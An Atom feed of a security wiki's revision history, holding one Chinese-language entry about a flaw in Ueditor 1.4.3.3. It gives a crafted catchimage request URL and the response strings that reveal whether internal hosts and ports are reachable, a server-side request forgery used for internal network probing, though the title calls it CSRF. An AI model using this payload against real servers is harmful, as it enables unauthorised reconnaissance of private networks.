<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Ueditor_1.4.3.3%E7%89%88%E6%9C%ACCSRF%E6%BC%8F%E6%B4%9E</id>
	<title>Ueditor 1.4.3.3版本CSRF漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Ueditor_1.4.3.3%E7%89%88%E6%9C%ACCSRF%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Ueditor_1.4.3.3%E7%89%88%E6%9C%ACCSRF%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-13T16:31:28Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Ueditor_1.4.3.3%E7%89%88%E6%9C%ACCSRF%E6%BC%8F%E6%B4%9E&amp;diff=1761&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==存在漏洞路徑== &lt;pre&gt; http://localhost:8088/jsp/controller.jsp?action=catchimage&amp;source[]=http://192.168.135.133:8080/test.jpg &lt;/pre&gt;  ==漏洞利用== 可根據頁面...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Ueditor_1.4.3.3%E7%89%88%E6%9C%ACCSRF%E6%BC%8F%E6%B4%9E&amp;diff=1761&amp;oldid=prev"/>
		<updated>2021-04-20T05:46:31Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==存在漏洞路徑== &amp;lt;pre&amp;gt; http://localhost:8088/jsp/controller.jsp?action=catchimage&amp;amp;source[]=http://192.168.135.133:8080/test.jpg &amp;lt;/pre&amp;gt;  ==漏洞利用== 可根據頁面...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==存在漏洞路徑==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
http://localhost:8088/jsp/controller.jsp?action=catchimage&amp;amp;source[]=http://192.168.135.133:8080/test.jpg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==漏洞利用==&lt;br /&gt;
可根據頁面返回的結果不同判斷該地址端口是否開放：&lt;br /&gt;
&lt;br /&gt;
如果抓取不存在的圖片地址時，頁面返回{&amp;quot;state&amp;quot;: &amp;quot;SUCCESS&amp;quot;, list: [{&amp;quot;state&amp;quot;:&amp;quot;\u8fdc\u7a0b\u8fde\u63a5\u51fa\u9519&amp;quot;} ]}，即state為“遠程連接出錯”。&lt;br /&gt;
&lt;br /&gt;
如果成功抓取到圖片，頁面返回{&amp;quot;state&amp;quot;: &amp;quot;SUCCESS&amp;quot;, list: [{&amp;quot;state&amp;quot;: &amp;quot;SUCCESS&amp;quot;,&amp;quot;size&amp;quot;:&amp;quot;5103&amp;quot;,&amp;quot;source&amp;quot;:&amp;quot;http://192.168.135.133 :8080/tomcat.png&amp;quot;,&amp;quot;title&amp;quot;:&amp;quot;1527173588127099881.png&amp;quot;,&amp;quot;url&amp;quot;:&amp;quot;/ueditor/jsp/upload/image/20180524/1527173588127099881.png&amp;quot;} ]}，即state為“SUCCESS”。&lt;br /&gt;
&lt;br /&gt;
如果主機無法訪問，頁面返回{&amp;quot;state&amp;quot;:&amp;quot;SUCCESS&amp;quot;, list: [{&amp;quot;state&amp;quot;: &amp;quot;\u6293\u53d6\u8fdc\u7a0b\u56fe\u7247\u5931\u8d25&amp;quot;}]}，即state為“抓取遠程圖片失敗”。&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
由於除了在config.js中的catcherLocalDomain配置了過濾的地址外，沒有針對內部地址進行過濾，所以可以根據抓取遠程圖片返回結果的不同，來進行內網的探測。&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>